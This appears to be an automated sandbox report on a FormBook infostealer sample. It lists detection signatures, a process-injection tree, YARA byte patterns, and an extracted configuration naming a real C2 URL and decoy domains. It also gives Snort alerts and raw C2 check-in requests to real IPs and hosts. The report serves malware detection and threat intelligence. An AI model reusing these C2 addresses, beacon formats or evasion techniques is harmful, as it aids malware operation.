
Analysis Report UGGJ4NnzFz

Overview

General Information

Sample Name: UGGJ4NnzFz (renamed file extension from none to exe)
Analysis ID: 432566
MD5: b148ae414eb8a1b34a15cdb32c21f9ee
SHA1: 25b78f76010cc34843352c78d4f8e07a28b46b32
SHA256: 193788545c12c697fe660e9dd178e5d97478d5b90d5b0096f1cd6a9b641d48e9

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • UGGJ4NnzFz.exe (PID: 4884 cmdline: 'C:\Users\user\Desktop\UGGJ4NnzFz.exe' MD5: B148AE414EB8A1B34A15CDB32C21F9EE)
    • UGGJ4NnzFz.exe (PID: 5520 cmdline: 'C:\Users\user\Desktop\UGGJ4NnzFz.exe' MD5: B148AE414EB8A1B34A15CDB32C21F9EE)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 6512 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 6668 cmdline: /c del 'C:\Users\user\Desktop\UGGJ4NnzFz.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rebeccannemontgomery.net/dp3a/"], "decoy": ["frayl.com", "utmostroofing.com", "galactigames.com", "kingguardgroup.com", "goldinsacks.com", "platinumcreditrepair.net", "sw-advisers.com", "ininjawebtech.com", "spectrurnvisionpartners.com", "freshdeliciousberryfarm.com", "12796.xyz", "goldgrandpa.com", "chicago-trading.academy", "newstechealth.com", "pecon.pro", "2dmaxximumrecords.com", "athrivingthirtysomething.com", "universalphonemarket.com", "motivationinterviewsinc.com", "virtualrealty.tours", "bring-wellness.com", "fengshuimingshi.com", "urbanpite.com", "28ji.site", "xuanpei.net", "letstrumpbiden.com", "xtremetechtv.com", "leyardzm.net", "funemoke.net", "closetofaurora.com", "theyogirunner.com", "pmbcommercial.com", "michiganpsychologist.com", "foodandbio.com", "goodlukc.com", "kingofkingslovesyou.com", "topazsnacks.com", "vinpearlnhatrangbay.com", "24x7dream.com", "attafine.com", "hireinone.xyz", "growwithjenn.com", "fortworthsurrogacy.com", "kladios.com", "aishark.net", "havenparent.com", "elementaryelegance.com", "moulardfarms.net", "tomrings.com", "allyexpense.com", "juleshypnosis.com", "rboxtogo.com", "restorey.com", "oilleakgames.com", "protectpursuit.com", "checkitreviews.com", "jeremypohu.com", "mnanoramaonline.com", "xn--instagrm-fza.com", "fianser.com", "www-338616.com", "woollardhenry.com", "reviewdrkofford.com", "vandalvans.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  Strings:
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings: the same $sequence_0 to $sequence_9 matches, at the same offsets, as listed for the first memory dump above

Unpacked PEs

Source | Rule | Description | Author
1.1.UGGJ4NnzFz.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.1.UGGJ4NnzFz.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.1.UGGJ4NnzFz.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  Strings:
  • 0x158b9:$sqlite3step: 68 34 1C 7B E1
  • 0x159cc:$sqlite3step: 68 34 1C 7B E1
  • 0x158e8:$sqlite3text: 68 38 2A 90 C5
  • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
  • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings: the same $sequence_0 to $sequence_9 matches, at the same offsets (0x85e8 onward), as listed for the 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp memory dump above

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Found malware configuration
Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook (the extracted C2 list and decoy domains are given in full under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: UGGJ4NnzFz.exe, Virustotal: Detection: 29%
Source: UGGJ4NnzFz.exe, ReversingLabs: Detection: 29%
Yara detected FormBook
Source: Yara match, File source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: UGGJ4NnzFz.exe, Joe Sandbox ML: detected
Source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.cmmon32.exe.624368.0.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 9.2.cmmon32.exe.4a87960.5.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: UGGJ4NnzFz.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: cmmon32.pdb, source: UGGJ4NnzFz.exe, 00000001.00000002.274327095.0000000000930000.00000040.00000001.sdmp
Source: Binary string: cmmon32.pdbGCTL, source: UGGJ4NnzFz.exe, 00000001.00000002.274327095.0000000000930000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP, source: UGGJ4NnzFz.exe, 00000000.00000003.212550994.0000000009A50000.00000004.00000001.sdmp, UGGJ4NnzFz.exe, 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, cmmon32.exe, 00000009.00000002.477934562.000000000466F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb, source: UGGJ4NnzFz.exe, cmmon32.exe
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe, Code function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe, Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe, Code function: 0_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe, File opened: C:\Users\user
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe, File opened: C:\Users\user\Desktop\UGGJ4NnzFz.exe
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe, File opened: C:\Users\user\AppData\Local\Temp\nsyA3E3.tmp
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe, File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe, File opened: C:\Users\user\AppData\Local\Temp\dceotuvjnitpz
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe, File opened: C:\Users\user\AppData\Local\Temp\6jlp0t221b5inmotwb6
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe, Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe, Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\cmmon32.exe, Code function: 4x nop then pop ebx

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 157.245.232.77:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 157.245.232.77:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49743 -> 157.245.232.77:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 23.227.38.74:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 23.227.38.74:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49744 -> 23.227.38.74:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 62.149.128.40:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 62.149.128.40:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 62.149.128.40:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.rebeccannemontgomery.net/dp3a/
Source: global traffic, HTTP traffic detected: GET /dp3a/?rTWxa=fFin23A3InOxv8Q1OZSqiWR/FjS3KuFpXPcC+roY+PuFOGx4uYNLJpybUr51Ny74Rks0&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1; Host: www.protectpursuit.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=DH0B3lUhAa5VBPw8nCCOXpLU24maY23yGmrt22qj0kvQjGAaKYYXdT0Mh/TRCK5k4cmX HTTP/1.1; Host: www.freshdeliciousberryfarm.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /dp3a/?rTWxa=76AMkVxxuSKB5pgh4RNc3EipO3rbFW8MEUNJys/eLa/AxdTMjRac1XeBowoP/wZORJRk&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1; Host: www.sw-advisers.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=GkWHDDYMiWr4Ju0U4teKyAR8hKcpKlGmV2ZHyKwA/bXhSAEvQCtqjiLuXtjyxk2BGjrR HTTP/1.1; Host: www.goldgrandpa.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkTQi7ynUSvkYXlrnDKiUoE/Bv6J35YIy7pKLvP HTTP/1.1; Host: www.goldinsacks.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=WU2tAheQ8tcf93YEudKDnPgih3iSbxP+RxOmhUzH4Gc7ohEPLFzZpUy5aqQrTWYg/sJi HTTP/1.1; Host: www.growwithjenn.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic, HTTP traffic detected: GET /dp3a/?rTWxa=F+NQG3wr2qmzRibT9BAJK2aVObQEDzb5Y6jfukgEe6sv7RNklleEIbtQ/MsGh07J4TVQ&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1; Host: www.bring-wellness.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: Joe Sandbox View, IP Address: 62.149.128.40
Source: Joe Sandbox View, IP Address: 160.153.136.3
Source: Joe Sandbox View, ASN Name: ARUBA-ASNIT
Source: Joe Sandbox View, ASN Name: DIGITALOCEAN-ASNUS
Source: Joe Sandbox View, ASN Name: GODADDY-AMSDE
Source: unknown, DNS traffic detected: queries for: www.allyexpense.com
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.18.0; Date: Thu, 10 Jun 2021 12:36:41 GMT; Content-Length: 0; Connection: close; Vary: Origin
Source: explorer.exe, 00000005.00000000.243022524.0000000008907000.00000004.00000001.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: UGGJ4NnzFz.exe, String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: UGGJ4NnzFz.exe, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: cmmon32.exe, 00000009.00000002.479471132.0000000004C02000.00000004.00000001.sdmp, String found in binary or memory: http://www.goldinsacks.com:80/dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkT
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.243294084.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe, Code function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
Source: UGGJ4NnzFz.exe, 00000000.00000002.219983630.00000000006FA000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, same memory dump (type: MEMORY) and unpacked PE (type: UNPACKEDPE) file sources as listed for this signature under AV Detection above

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_004181BC NtCreateFile,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_004182EB NtClose,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_0041839B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D99A0 NtCreateSection,LdrInitializeThunk,
